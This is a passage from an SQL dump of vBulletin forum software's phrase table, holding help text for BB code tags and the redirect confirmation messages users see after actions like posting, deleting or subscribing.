'vbulletin', '', 0, ''), (35279, -1, 'images', 'fronthelp', 'Images', 'vbulletin', '', 0, ''), (35280, -1, 'img_tag_allows', 'fronthelp', 'The [img] tag allows you to embed images within your posts. You can also combine this tag with the [url] tag to make images become links.', 'vbulletin', '', 0, ''), (35281, -1, 'incorrect_bb_code_usage', 'fronthelp', 'Incorrect BB Code Usage:\r\n
    \r\n
  • [url] www.example.com [/url] - don\'t put spaces between the bracketed code and the text you are applying the code to.
  • \r\n
  • [email]myname@domain.com[email] - the end brackets must include a forward slash ([/email])
  • \r\n
', 'vbulletin', 'vBulletin Solutions', 1206971125, '3.7.0 Release Candidate 2'), (35282, -1, 'indent', 'fronthelp', 'Indent', 'vbulletin', '', 0, ''), (35283, -1, 'indent_tag_allows', 'fronthelp', 'The [indent] tag allows you to indent your text.', 'vbulletin', '', 0, ''), (35284, -1, 'italic', 'fronthelp', 'Italic', 'vbulletin', '', 0, ''), (35285, -1, 'left', 'fronthelp', 'Left', 'vbulletin', '', 0, ''), (35286, -1, 'left_right_and_center_tags_allow', 'fronthelp', 'The [left], [right] and [center] tags allow you to change the alignment of your text.', 'vbulletin', '', 0, ''), (35287, -1, 'linked', 'fronthelp', 'Linked', 'vbulletin', '', 0, ''), (35288, -1, 'list_item_1', 'fronthelp', 'list item 1', 'vbulletin', '', 0, ''), (35289, -1, 'list_item_2', 'fronthelp', 'list item 2', 'vbulletin', '', 0, ''), (35290, -1, 'list_tag_allows', 'fronthelp', 'The [list] tag allows you to create simple, bulleted lists without specifying an option. Within the value portion, each bullet is denoted by the [*] tag.', 'vbulletin', '', 0, ''), (35291, -1, 'list_tag_allows_advanced', 'fronthelp', 'The [list] tag allows you to create advanced lists by specifying an option. The option should have a value of 1 (for a numbered list) or A (for an alphabetic with capital letters list) or a (for an alphabetic with lowercase letters list) or I (for a numbered with capital Roman numeral list) or i (for a numbered with small Roman numeral list).', 'vbulletin', '', 0, ''), (35292, -1, 'match_all_words', 'fronthelp', 'Match All Words', 'vbulletin', '', 0, ''), (35293, -1, 'match_any_words', 'fronthelp', 'Match Any Words', 'vbulletin', '', 0, ''), (35294, -1, 'match_complete_phrase', 'fronthelp', 'Match Complete Phrase', 'vbulletin', '', 0, ''), (35295, -1, 'matching_options', 'fronthelp', 'Matching Options', 'vbulletin', '', 0, ''), (35296, -1, 'meaning', 'fronthelp', 'Meaning', 'vbulletin', '', 0, ''), (35297, -1, 'no_predefined_avatars_available', 'fronthelp', 'There are no pre-defined avatars available.', 'vbulletin', '', 0, ''), (35298, -1, 'noparse_tag_allows', 'fronthelp', 'The [noparse] tag allows you to stop the parsing of BB code.', 'vbulletin', 'vBulletin Solutions', 1206964233, '3.7.0 Release Candidate 2'), (35299, -1, 'not_linked', 'fronthelp', 'Not linked', 'vbulletin', '', 0, ''), (35300, -1, 'note_the_id_is_just_an_example', 'fronthelp', '(Note: The threadid/postid is just an example and may not link to a valid thread/post.)', 'vbulletin', '', 0, ''), (35301, -1, 'php_tag_performs', 'fronthelp', 'The [php] tag performs the same function as the [code] tag, but also adds syntax highlighting for PHP code. Although it is designed for PHP, it may correctly highlight some other C-like languages.', 'vbulletin', '', 0, ''), (35302, -1, 'post_linking', 'fronthelp', 'Post Linking', 'vbulletin', '', 0, ''), (35303, -1, 'post_tag_allows', 'fronthelp', 'The [post] tag allows you to link to posts by specifying the post id. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''), (35304, -1, 'postid', 'fronthelp', 'postid', 'vbulletin', '', 0, ''), (35305, -1, 'quote_tag_allows', 'fronthelp', 'The [quote] tag allows you to attribute text to someone else.', 'vbulletin', '', 0, ''), (35306, -1, 'resulting_graphic', 'fronthelp', 'Resulting Graphic', 'vbulletin', '', 0, ''), (35307, -1, 'right', 'fronthelp', 'Right', 'vbulletin', '', 0, ''), (35308, -1, 'search_faq', 'fronthelp', 'Search FAQ', 'vbulletin', '', 0, ''), (35309, -1, 'search_in', 'fronthelp', 'Search in', 'vbulletin', '', 0, ''), (35310, -1, 'search_titles_and_text', 'fronthelp', 'Search Titles & Text', 'vbulletin', '', 0, ''), (35311, -1, 'search_words', 'fronthelp', 'Search Word(s)', 'vbulletin', '', 0, ''), (35312, -1, 'showing_avatars_x_to_y_of_z', 'fronthelp', 'Showing Avatars {1} to {2} of {3}', 'vbulletin', 'vBulletin Solutions', 1205925247, '3.7.0 Release Candidate 1'), (35313, -1, 'signature_picture', 'fronthelp', 'Signature Picture', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35314, -1, 'signature_picture_description', 'fronthelp', 'Signature Picture Description (optional)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35315, -1, 'sigpic_tag_allows', 'fronthelp', 'The [sigpic] tag allows you to insert your uploaded signature picture into your signature. This tag does not work in posts and will not work if you have not uploaded a signature picture.', 'vbulletin', 'vBulletin Solutions', 1161272671, '3.6.3'), (35316, -1, 'size', 'fronthelp', 'Size', 'vbulletin', '', 0, ''), (35317, -1, 'size_tag_allows', 'fronthelp', 'The [size] tag allows you to change the size of your text.', 'vbulletin', '', 0, ''), (35318, -1, 'smilies_are_small_images', 'fronthelp', '\'Smilies\' are small graphical images that can be used to convey an emotion or feeling.\r\n If you have used email or internet chat, you are likely familiar with the smilie concept.\r\n Certain standard strings are automatically converted into smilies.\r\n Try twisting your head on one side if you do not \'get\' smilies;\r\n using a bit of imagination should reveal a face of some description.
\r\n
\r\n If you want to disable smilies in a post that you make, you can select the \'Disable Smilies\' option\r\n when posting. This is particularly useful if you are posting program code and you do not\r\n want ;) converted to a smilie face!', 'vbulletin', '', 0, ''), (35319, -1, 'stop_bbcode_parsing', 'fronthelp', 'Stop BB Code Parsing', 'vbulletin', 'vBulletin Solutions', 1206964770, '3.7.0 Release Candidate 2'), (35320, -1, 'text_two_sizes_larger_than_normal', 'fronthelp', 'this text is two sizes larger than normal', 'vbulletin', '', 0, ''), (35321, -1, 'this_text_is_blue', 'fronthelp', 'this text is blue', 'vbulletin', '', 0, ''), (35322, -1, 'this_text_is_bold', 'fronthelp', 'this text is bold', 'vbulletin', '', 0, ''), (35323, -1, 'this_text_is_center_aligned', 'fronthelp', 'this text is center-aligned', 'vbulletin', '', 0, ''), (35324, -1, 'this_text_is_courier_font', 'fronthelp', 'this text is in the courier font', 'vbulletin', '', 0, ''), (35325, -1, 'this_text_is_highlighted', 'fronthelp', 'this text is highlighted', 'vbulletin', '', 0, ''), (35326, -1, 'this_text_is_indented', 'fronthelp', 'this text is indented', 'vbulletin', '', 0, ''), (35327, -1, 'this_text_is_italic', 'fronthelp', 'this text is italic', 'vbulletin', '', 0, ''), (35328, -1, 'this_text_is_left_aligned', 'fronthelp', 'this text is left-aligned', 'vbulletin', '', 0, ''), (35329, -1, 'this_text_is_right_aligned', 'fronthelp', 'this text is right-aligned', 'vbulletin', '', 0, ''), (35330, -1, 'this_text_is_underlined', 'fronthelp', 'this text is underlined', 'vbulletin', '', 0, ''), (35331, -1, 'thread_linking', 'fronthelp', 'Thread Linking', 'vbulletin', '', 0, ''), (35332, -1, 'thread_tag_allows', 'fronthelp', 'The [thread] tag allows you to link to threads by specifying the thread id. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''), (35333, -1, 'threadid', 'fronthelp', 'threadid', 'vbulletin', '', 0, ''), (35334, -1, 'underline', 'fronthelp', 'Underline', 'vbulletin', '', 0, ''), (35335, -1, 'url_hyperlinking', 'fronthelp', 'URL Hyperlinking', 'vbulletin', '', 0, ''), (35336, -1, 'url_tag_allows', 'fronthelp', 'The [url] tag allows you to link to other websites and files. You can include an optional parameter to \'name\' your link.', 'vbulletin', '', 0, ''), (35337, -1, 'usage', 'fronthelp', 'Usage', 'vbulletin', '', 0, ''), (35338, -1, 'value', 'fronthelp', 'value', 'vbulletin', '', 0, ''), (35339, -1, 'vbulletin_forums_post_269302', 'fronthelp', '{1} - Post 269302', 'vbulletin', '', 0, ''), (35340, -1, 'vbulletin_forums_thread_42918', 'fronthelp', '{1} - Thread 42918', 'vbulletin', '', 0, ''), (35341, -1, 'what_to_type', 'fronthelp', 'What to Type', 'vbulletin', '', 0, ''), (35342, -1, 'x_requiring_at_least_y_posts', 'fronthelp', '{1} Requiring at Least {2} Posts', 'vbulletin', '', 0, ''), (35343, -1, 'action_cancelled', 'frontredirect', 'Action Cancelled', 'vbulletin', 'vBulletin Solutions', 1195324017, '3.7.0 Beta 1'), (35344, -1, 'addlist_contact', 'frontredirect', '$userinfo[username] has now been successfully added to your contacts. You will now be returned to where you were.', 'vbulletin', 'vBulletin Solutions', 1196777568, '3.7.0 Beta 1'), (35345, -1, 'addlist_ignore', 'frontredirect', '$userinfo[username] has now been successfully added to your ignore list. You will now be returned to where you were.', 'vbulletin', '', 0, ''), (35346, -1, 'album_added_edited', 'frontredirect', 'Album added or edited successfully', 'vbulletin', 'vBulletin Solutions', 1192786200, '3.7.0 Beta 1'), (35347, -1, 'album_deleted', 'frontredirect', 'Album deleted successfully', 'vbulletin', 'vBulletin Solutions', 1192786181, '3.7.0 Beta 1'), (35348, -1, 'attachdel', 'frontredirect', 'Selected attachments have been deleted.', 'vbulletin', '', 0, ''), (35349, -1, 'calendaraddevent', 'frontredirect', 'Thanks for adding that event, you will now be returned to the event.', 'vbulletin', '', 0, ''), (35350, -1, 'calendardeleteevent', 'frontredirect', 'Thanks for deleting that event. You will now be returned to your calendar.', 'vbulletin', '', 0, ''), (35351, -1, 'calendarmoderated', 'frontredirect', 'Your event will not appear on the calendar until it is approved by a moderator.', 'vbulletin', '', 0, ''), (35352, -1, 'calendarmoveevent', 'frontredirect', 'The event has been successfully moved / copied. You will now be returned to the event.', 'vbulletin', '', 0, ''), (35353, -1, 'calendarupdateevent', 'frontredirect', 'Thanks for updating that event, you will be returned to it.', 'vbulletin', '', 0, ''), (35354, -1, 'contactsalready', 'frontredirect', 'You and $userinfo[username] are already contacts', 'vbulletin', 'vBulletin Solutions', 1208165335, '3.7.0 Release Candidate 4'), (35355, -1, 'deleted_announcement', 'frontredirect', 'The announcement $announcementinfo[title] has been deleted.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35356, -1, 'deletepost', 'frontredirect', 'The post has been successfully deleted. You will now be returned to the thread.', 'vbulletin', '', 0, ''), (35357, -1, 'deleteposts', 'frontredirect', 'The selected posts have been deleted. You will now be returned to the thread.', 'vbulletin', '', 0, ''), (35358, -1, 'deletethread', 'frontredirect', 'The thread has been successfully deleted. You will now be returned to the forum.', 'vbulletin', '', 0, ''), (35359, -1, 'deleteusernote', 'frontredirect', 'User Note has been deleted and you will now be returned to $userinfo[username]\'s User Notes.', 'vbulletin', '', 0, ''), (35360, -1, 'dst', 'frontredirect', 'DST Settings Updated', 'vbulletin', '', 0, ''), (35361, -1, 'duplicatepost', 'frontredirect', 'This post is a duplicate of a post that you have posted in the last five minutes. You will be redirected to that thread.', 'vbulletin', '', 0, ''), (35362, -1, 'duplicatethread', 'frontredirect', 'This thread is a duplicate of a thread that you have posted in the last five minutes. You will be redirected to the thread listings.', 'vbulletin', '', 0, ''), (35363, -1, 'editthanks', 'frontredirect', 'The post has been successfully edited. You are now being taken to the post.', 'vbulletin', '', 0, ''), (35364, -1, 'editthread', 'frontredirect', 'The thread has been successfully edited. You are now being taken to the thread.', 'vbulletin', '', 0, ''), (35365, -1, 'foldersedited', 'frontredirect', 'Your $itemtype folders have been updated. You will now be returned to your $itemtypes.', 'vbulletin', '', 0, ''), (35366, -1, 'forumpasswordcorrect', 'frontredirect', 'The password was correctly entered. You are being redirected to where you were.', 'vbulletin', '', 0, ''), (35367, -1, 'friendadded', 'frontredirect', 'You and $userinfo[username] are now friends', 'vbulletin', 'vBulletin Solutions', 1195171778, '3.7.0 Beta 1'), (35368, -1, 'friendrequested', 'frontredirect', 'Your friendship request has been sent to $userinfo[username]', 'vbulletin', 'vBulletin Solutions', 1195171768, '3.7.0 Beta 1'), (35369, -1, 'friendsalready', 'frontredirect', 'You and $userinfo[username] are already friends', 'vbulletin', 'vBulletin Solutions', 1195171759, '3.7.0 Beta 1'), (35370, -1, 'friendspending', 'frontredirect', 'Your friendship with $userinfo[username] is already pending', 'vbulletin', 'vBulletin Solutions', 1195171734, '3.7.0 Beta 1'), (35371, -1, 'friendswithself', 'frontredirect', 'You can\'t be friends with yourself', 'vbulletin', 'vBulletin Solutions', 1195235320, '3.7.0 Beta 1'), (35372, -1, 'groupdiscussiondelete', 'frontredirect', 'Discussion has been deleted. You are now being returned to the group.', 'vbulletin', 'vBulletin Solutions', 1212412503, '3.7.1'), (35373, -1, 'groupmessage_nodelete', 'frontredirect', 'You have chosen to not delete this message. You are now being returned to the group.', 'vbulletin', 'vBulletin Solutions', 1195595093, '3.7.0 Beta 1'), (35374, -1, 'groupmessagedelete', 'frontredirect', 'Message has been deleted. You are now being returned to the discussion.', 'vbulletin', 'vBulletin Solutions', 1212412526, '3.7.1'), (35375, -1, 'groups_picture_changed', 'frontredirect', 'Groups for this picture have been successfully updated', 'vbulletin', 'vBulletin Solutions', 1199224035, '3.7.0 Beta 4'), (35376, -1, 'infraction_added', 'frontredirect', 'Infraction for this user has been added.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35377, -1, 'infraction_reversed', 'frontredirect', 'Infraction for this user has been reversed.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35378, -1, 'inline_approvedattachments', 'frontredirect', 'The selected attachments have been approved.', 'vbulletin', '', 0, ''), (35379, -1, 'inline_approveddiscussions', 'frontredirect', 'The selected discussions have been approved', 'vbulletin', 'vBulletin Solutions', 1212165298, '3.7.1'), (35380, -1, 'inline_approvedmessages', 'frontredirect', 'The selected messages have been approved.', 'vbulletin', 'vBulletin Solutions', 1191952288, '3.7.0 Beta 1'), (35381, -1, 'inline_approvedpictures', 'frontredirect', 'The selected pictures have been approved.', 'vbulletin', 'vBulletin Solutions', 1203723217, '3.7.0 Beta 6'), (35382, -1, 'inline_approvedposts', 'frontredirect', 'The selected posts have been approved.', 'vbulletin', '', 0, ''), (35383, -1, 'inline_approvedthreads', 'frontredirect', 'The selected threads have been approved.', 'vbulletin', '', 0, ''), (35384, -1, 'inline_closed', 'frontredirect', 'The selected threads have been closed.', 'vbulletin', '', 0, ''), (35385, -1, 'inline_copiedposts', 'frontredirect', 'The selected posts have been copied.', 'vbulletin', 'vBulletin Solutions', 1145645439, '3.6.0 Beta 1'), (35386, -1, 'inline_deleted', 'frontredirect', 'The selected threads have been deleted.', 'vbulletin', '', 0, ''), (35387, -1, 'inline_deleteddiscussions', 'frontredirect', 'The selected discussions have been deleted.', 'vbulletin', 'vBulletin Solutions', 1212401324, '3.7.1'), (35388, -1, 'inline_deletedmessages', 'frontredirect', 'The selected messages have been deleted.', 'vbulletin', 'vBulletin Solutions', 1191952385, '3.7.0 Beta 1'), (35389, -1, 'inline_deletedpictures', 'frontredirect', 'The selected pictures have been deleted.', 'vbulletin', 'vBulletin Solutions', 1203725390, '3.7.0 Beta 6'), (35390, -1, 'inline_deletedposts', 'frontredirect', 'The selected posts have been deleted.', 'vbulletin', '', 0, ''), (35391, -1, 'inline_mergedposts', 'frontredirect', 'The selected posts have been merged.', 'vbulletin', '', 0, ''), (35392, -1, 'inline_mergedthreads', 'frontredirect', 'The selected threads have been merged.', 'vbulletin', '', 0, ''), (35393, -1, 'inline_messagelist_cleared', 'frontredirect', 'The message list has been cleared.', 'vbulletin', 'vBulletin Solutions', 1191952152, '3.7.0 Beta 1'), (35394, -1, 'inline_moved', 'frontredirect', 'The selected threads have been moved.', 'vbulletin', '', 0, ''), (35395, -1, 'inline_movedposts', 'frontredirect', 'The selected posts have been moved.', 'vbulletin', '', 0, ''), (35396, -1, 'inline_opened', 'frontredirect', 'The selected threads have been opened.', 'vbulletin', '', 0, ''), (35397, -1, 'inline_postlist_cleared', 'frontredirect', 'The post list has been cleared.', 'vbulletin', '', 0, ''), (35398, -1, 'inline_stuck', 'frontredirect', 'The selected threads have been stuck.', 'vbulletin', '', 0, ''), (35399, -1, 'inline_threadlist_cleared', 'frontredirect', 'The thread list has been cleared.', 'vbulletin', '', 0, ''), (35400, -1, 'inline_unapprovedattachments', 'frontredirect', 'The selected attachments have been unapproved.', 'vbulletin', '', 0, ''), (35401, -1, 'inline_unapproveddiscussions', 'frontredirect', 'The selected discussions have been unapproved', 'vbulletin', 'vBulletin Solutions', 1212165388, '3.7.1'), (35402, -1, 'inline_unapprovedmessages', 'frontredirect', 'The selected messages have been unapproved.', 'vbulletin', 'vBulletin Solutions', 1191952302, '3.7.0 Beta 1'), (35403, -1, 'inline_unapprovedposts', 'frontredirect', 'The selected posts have been placed back into moderation.', 'vbulletin', '', 0, ''), (35404, -1, 'inline_unapprovedthreads', 'frontredirect', 'The selected threads have been placed back into moderation.', 'vbulletin', '', 0, ''), (35405, -1, 'inline_undeleted', 'frontredirect', 'The selected threads have been undeleted.', 'vbulletin', '', 0, ''), (35406, -1, 'inline_undeleteddiscussions', 'frontredirect', 'The selected discussions have been undeleted.', 'vbulletin', 'vBulletin Solutions', 1212415886, '3.7.1'), (35407, -1, 'inline_undeletedmessages', 'frontredirect', 'The selected messages have been undeleted.', 'vbulletin', 'vBulletin Solutions', 1191952432, '3.7.0 Beta 1'), (35408, -1, 'inline_undeleteposts', 'frontredirect', 'The selected posts have been undeleted.', 'vbulletin', 'vBulletin Solutions', 1142555568, '3.6.0 Beta 1'), (35409, -1, 'inline_unstuck', 'frontredirect', 'The selected threads have been unstuck.', 'vbulletin', '', 0, ''), (35410, -1, 'join_requests_processed', 'frontredirect', 'Join requests have been processed.', 'vbulletin', '', 0, ''), (35411, -1, 'login', 'frontredirect', 'Thank you for logging in, $bbuserinfo[username].', 'vbulletin', '', 0, ''), (35412, -1, 'logout', 'frontredirect', 'Logging you out, $bbuserinfo[username].', 'vbulletin', '', 0, ''), (35413, -1, 'lostactivatecode', 'frontredirect', 'Your account details and activation code have been sent to that email address. You will now be returned to where you were.', 'vbulletin', '', 0, ''), (35414, -1, 'lostpw', 'frontredirect', 'Your username and details about how to reset your password have been sent to you by email. You will now be returned to where you were.', 'vbulletin', 'vBulletin Solutions', 1245085058, '3.8.3'), (35415, -1, 'markread', 'frontredirect', 'All forums have been marked as read and the new post indicators will now be off.', 'vbulletin', '', 0, ''), (35416, -1, 'markread_single', 'frontredirect', 'This forum has been marked as read and its new post indicator will now be off.', 'vbulletin', '', 0, ''), (35417, -1, 'mergethread', 'frontredirect', 'Those threads have been successfully merged. You will now be returned to the result of the merging.', 'vbulletin', '', 0, ''), (35418, -1, 'movethread', 'frontredirect', 'The thread has been successfully moved / copied. You will now be returned to the thread.', 'vbulletin', '', 0, ''), (35419, -1, 'nodelete', 'frontredirect', 'You have chosen not to delete this post. You are now being returned to the thread.', 'vbulletin', '', 0, ''), (35420, -1, 'nodeletenote', 'frontredirect', 'You will be returned to $userinfo[username]\'s User Notes.', 'vbulletin', '', 0, ''), (35421, -1, 'notice_dismissed', 'frontredirect', 'Notice dismissed.', 'vbulletin', 'vBulletin Solutions', 1219935458, '3.8.0 Alpha 1'), (35422, -1, 'openclose', 'frontredirect', 'The thread has been successfully $action. You are now being taken to the thread.', 'vbulletin', '', 0, ''), (35423, -1, 'payment_complete', 'frontredirect', 'Payment Complete', 'vbulletin', '', 0, ''), (35424, -1, 'picture_removed_from_group', 'frontredirect', 'Picture removed from group successfully', 'vbulletin', 'vBulletin Solutions', 1195324126, '3.7.0 Beta 1'), (35425, -1, 'picturecomment_deleted', 'frontredirect', 'This comment has been deleted. You are now being returned to the picture.', 'vbulletin', 'vBulletin Solutions', 1200402736, '3.7.0 Beta 4'), (35426, -1, 'picturecomment_editthanks', 'frontredirect', 'The comment has been successfully edited. You are now being taken to the comment.', 'vbulletin', 'vBulletin Solutions', 1200402667, '3.7.0 Beta 4'), (35427, -1, 'picturecomment_nodelete', 'frontredirect', 'You have chosen to not delete this comment. You are now being returned to the picture.', 'vbulletin', 'vBulletin Solutions', 1200402781, '3.7.0 Beta 4'), (35428, -1, 'picturecomment_thanks', 'frontredirect', 'Thank you for posting! You will now be taken to your comment.', 'vbulletin', 'vBulletin Solutions', 1200402701, '3.7.0 Beta 4'), (35429, -1, 'pictures_added', 'frontredirect', 'Pictures added successfully', 'vbulletin', 'vBulletin Solutions', 1195318068, '3.7.0 Beta 1'), (35430, -1, 'pictures_updated', 'frontredirect', 'Pictures updated successfully', 'vbulletin', 'vBulletin Solutions', 1192786211, '3.7.0 Beta 1'), (35431, -1, 'pictures_uploaded', 'frontredirect', 'Pictures uploaded successfully', 'vbulletin', 'vBulletin Solutions', 1192786225, '3.7.0 Beta 1'), (35432, -1, 'pm_allmessagesdeselected', 'frontredirect', 'All messages have been deselected.', 'vbulletin', 'vBulletin Solutions', 1218719684, '3.8.0 Alpha 1'), (35433, -1, 'pm_messagesdeleted', 'frontredirect', 'The message(s) have been deleted. You are now being redirected to your PM list.', 'vbulletin', '', 0, ''), (35434, -1, 'pm_messagesent', 'frontredirect', 'Your private message has been sent. You will now be taken to your PM list. Thanks!', 'vbulletin', '', 0, ''), (35435, -1, 'pm_messagesmarkedas', 'frontredirect', 'Selected Messages Marked as $readunread', 'vbulletin', '', 0, ''), (35436, -1, 'pm_messagesmoved', 'frontredirect', 'Your message(s) have been moved. You will now be returned to your PM list.', 'vbulletin', '', 0, ''), (35437, -1, 'pm_receiptsdeleted', 'frontredirect', 'Private Message Receipts Deleted', 'vbulletin', '', 0, ''), (35438, -1, 'pollvoteduplicate', 'frontredirect', 'You have already voted on this poll. You will be redirected to that poll.', 'vbulletin', 'vBulletin Solutions', 1204657411, '3.7.0 Beta 6'), (35439, -1, 'pollvotethanks', 'frontredirect', 'Thank you for voting. You will now be taken back to the poll.', 'vbulletin', '', 0, ''), (35440, -1, 'post_manage', 'frontredirect', 'This post was successfully managed. You are now being redirected to it.', 'vbulletin', '', 0, ''), (35441, -1, 'postthanks', 'frontredirect', 'Thank you for posting! You will now be taken to your post. If you opted to post a poll, you will now be allowed to do so.', 'vbulletin', 'vBulletin Solutions', 1142900764, '3.6.0 Beta 1'), (35442, -1, 'postthanks_moderate', 'frontredirect', 'Thank you for posting! Your post will not be visible until a moderator has approved it for posting. You will now be taken back to the forum. If you opted to post a poll, you will now be allowed to do so.', 'vbulletin', 'vBulletin Solutions', 1150845831, '3.6.0 Beta 3'), (35443, -1, 'postthanks_nopermission', 'frontredirect', 'Thank you for posting! You will now be taken back to the forum since you do not have permission to view thread content in this forum. If you opted to post a poll, you will now be allowed to do so.', 'vbulletin', 'vBulletin Solutions', 1197326030, '3.7.0 Beta 1'), (35444, -1, 'redirects_removed', 'frontredirect', 'Thread moved redirects successfully removed. You are now being redirected back to the thread.', 'vbulletin', '', 0, ''), (35445, -1, 'reminderdeleted', 'frontredirect', 'Reminder(s) have been deleted. You will now be returned to your current event reminders.', 'vbulletin', '', 0, ''), (35446, -1, 'reminderupdated', 'frontredirect', 'Reminder(s) have been updated. You will now be returned to your current event reminders.', 'vbulletin', '', 0, ''), (35447, -1, 'removedusers', 'frontredirect', 'Users removed from usergroup.', 'vbulletin', '', 0, ''), (35448, -1, 'removelist_buddy', 'frontredirect', '$userinfo[username] has now been successfully removed from your contacts. You will now be returned to where you were.', 'vbulletin', 'vBulletin Solutions', 1196430406, '3.7.0 Beta 1'), (35449, -1, 'removelist_friend', 'frontredirect', 'Your friendship with $userinfo[username] has been broken', 'vbulletin', 'vBulletin Solutions', 1195753794, '3.7.0 Beta 1'), (35450, -1, 'removelist_ignore', 'frontredirect', '$userinfo[username] has now been successfully removed from your ignore list. You will now be returned to where you were.', 'vbulletin', '', 0, ''), (35451, -1, 'reportthanks', 'frontredirect', 'Thank you for reporting that post. It will be dealt with as appropriate in due course.', 'vbulletin', '', 0, ''), (35452, -1, 'reputationadd', 'frontredirect', 'Thanks for adding reputation to this user. May you be lucky enough to receive the same Reputation back in turn.', 'vbulletin', 'vBulletin Solutions', 1217252120, '3.8.0 Alpha 1'), (35453, -1, 'reputationminus', 'frontredirect', 'Thanks for deducting reputation from this user.', 'vbulletin', 'vBulletin Solutions', 1217252212, '3.8.0 Alpha 1'), (35454, -1, 'saved_announcement', 'frontredirect', 'The announcement $title has been successfully saved.', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'), (35455, -1, 'search', 'frontredirect', 'Your search is in progress and you will be taken to the results in a moment. Thank you for your patience.', 'vbulletin', '', 0, ''), (35456, -1, 'search_preferencescleared', 'frontredirect', 'Search Preferences Cleared', 'vbulletin', 'vBulletin Solutions', 1166835566, '3.6.5'), (35457, -1, 'search_preferencessaved', 'frontredirect', 'Search Preferences Saved', 'vbulletin', '', 0, ''), (35458, -1, 'sentemail', 'frontredirect', 'We have sent your email to $sendtoname. You will now be returned to the thread.', 'vbulletin', '', 0, ''), (35459, -1, 'sentfeedback', 'frontredirect', 'Your feedback to the webmaster has been sent.', 'vbulletin', '', 0, ''), (35460, -1, 'sticky', 'frontredirect', 'The thread has been successfully $action. You are now being taken to the thread.', 'vbulletin', '', 0, ''), (35461, -1, 'sub_threadsmoved', 'frontredirect', 'Your thread(s) have been moved. You will now be returned to your subscriptions.', 'vbulletin', '', 0, ''), (35462, -1, 'submove', 'frontredirect', 'Your thread(s) have been moved. You will now be returned to your subscriptions.', 'vbulletin', '', 0, ''), (35463, -1, 'subsadd_discussion', 'frontredirect', 'A subscription for this discussion has been added.', 'vbulletin', 'vBulletin Solutions', 1213715753, '3.7.1'), (35464, -1, 'subsadd_event', 'frontredirect', 'A notification for this event has been added.', 'vbulletin', '', 0, ''), (35465, -1, 'subsadd_forum', 'frontredirect', 'A subscription for this forum has been added.', 'vbulletin', '', 0, ''), (35466, -1, 'subsadd_group', 'frontredirect', 'A subscription for this social group has been added.', 'vbulletin', 'vBulletin Solutions', 1213716705, '3.7.1'), (35467, -1, 'subsadd_thread', 'frontredirect', 'A subscription for this thread has been added.', 'vbulletin', '', 0, ''), (35468, -1, 'subsremove_discussion', 'frontredirect', 'Your subscription for this discussion has been removed.', 'vbulletin', 'vBulletin Solutions', 1213715649, '3.7.1'), (35469, -1, 'subsremove_event', 'frontredirect', 'Your notification for this event has been removed.', 'vbulletin', '', 0, ''), (35470, -1, 'subsremove_forum', 'frontredirect', 'Your subscription for this forum has been removed.', 'vbulletin', '', 0, ''), (35471, -1, 'subsremove_group', 'frontredirect', 'Your subscription for this social group has been removed.', 'vbulletin', 'vBulletin Solutions', 1213715678, '3.7.1'), (35472, -1, 'subsremove_thread', 'frontredirect', 'Your subscription for this thread has been removed.', 'vbulletin', '', 0, ''), (35473, -1, 'subupdate', 'frontredirect', 'Subscription(s) have been updated. You will now be returned to your current subscriptions.', 'vbulletin', '', 0, ''), (35474, -1, 'successfully_created_group', 'frontredirect', 'Group was created successfully.', 'vbulletin', 'vBulletin Solutions', 1193762458, '3.7.0 Beta 1'), (35475, -1, 'successfully_deleted_group', 'frontredirect', 'You have successfully deleted the group', 'vbulletin', 'vBulletin Solutions', 1199126948, '3.7.0 Beta 4'), (35476, -1, 'successfully_edited_group', 'frontredirect', 'Group was updated successfully.', 'vbulletin', 'vBulletin Solutions', 1193762299, '3.7.0 Beta 1'), (35477, -1, 'successfully_invited_user', 'frontredirect', 'User Invited Successfully', 'vbulletin', 'vBulletin Solutions', 1198710019, '3.7.0 Beta 4'), (35478, -1, 'successfully_joined_group', 'frontredirect', 'You have joined the group successfully', 'vbulletin', 'vBulletin Solutions', 1199126943, '3.7.0 Beta 4'), (35479, -1, 'successfully_kicked_members', 'frontredirect', 'Group members removed successfully', 'vbulletin', 'vBulletin Solutions', 1201260283, '3.7.0 Beta 5'), (35480, -1, 'successfully_left_group', 'frontredirect', 'You have successfully left the group.', 'vbulletin', 'vBulletin Solutions', 1193762552, '3.7.0 Beta 1'), (35481, -1, 'successfully_managed_members', 'frontredirect', 'Group membership updated successfully', 'vbulletin', 'vBulletin Solutions', 1198777534, '3.7.0 Beta 4'), (35482, -1, 'successfully_removed_invites', 'frontredirect', 'Invited users successfully removed', 'vbulletin', 'vBulletin Solutions', 1199126922, '3.7.0 Beta 4'), (35483, -1, 'thread_approved', 'frontredirect', 'The thread has been approved and moved out of the moderation queue.', 'vbulletin', 'vBulletin Solutions', 1212676451, '3.8.0 Alpha 1'), (35484, -1, 'thread_unapproved', 'frontredirect', 'The thread has been unapproved and moved into the moderation queue.', 'vbulletin', 'vBulletin Solutions', 1212676469, '3.8.0 Alpha 1'), (35485, -1, 'threadclosed', 'frontredirect', 'Sorry! This thread is closed! You will now be returned to the thread.', 'vbulletin', '', 0, ''), (35486, -1, 'threadrate_add', 'frontredirect', 'Your vote on this thread has been added.', 'vbulletin', '', 0, ''), (35487, -1, 'threadrate_update', 'frontredirect', 'Your vote on this thread has been updated.', 'vbulletin', '', 0, ''), (35488, -1, 'updatelist_buddy', 'frontredirect', 'Your contact list has been updated.', 'vbulletin', 'vBulletin Solutions', 1196773591, '3.7.0 Beta 1'), (35489, -1, 'updatelist_ignore', 'frontredirect', 'Your ignore list has been updated.', 'vbulletin', '', 0, ''), (35490, -1, 'updatelist_incoming', 'frontredirect', 'Your incoming friendship request list has been updated.', 'vbulletin', 'vBulletin Solutions', 1195754569, '3.7.0 Beta 1'), (35491, -1, 'updatethanks', 'frontredirect', 'Thank you for updating your profile, $bbuserinfo[username].', 'vbulletin', '', 0, ''), (35492, -1, 'updatethanks_newemail', 'frontredirect', 'Thank you for updating your profile, $bbuserinfo[username]. Because you changed your email address, you will be sent an email to verify its existence.', 'vbulletin', '', 0, ''), (35493, -1, 'usercss_saved', 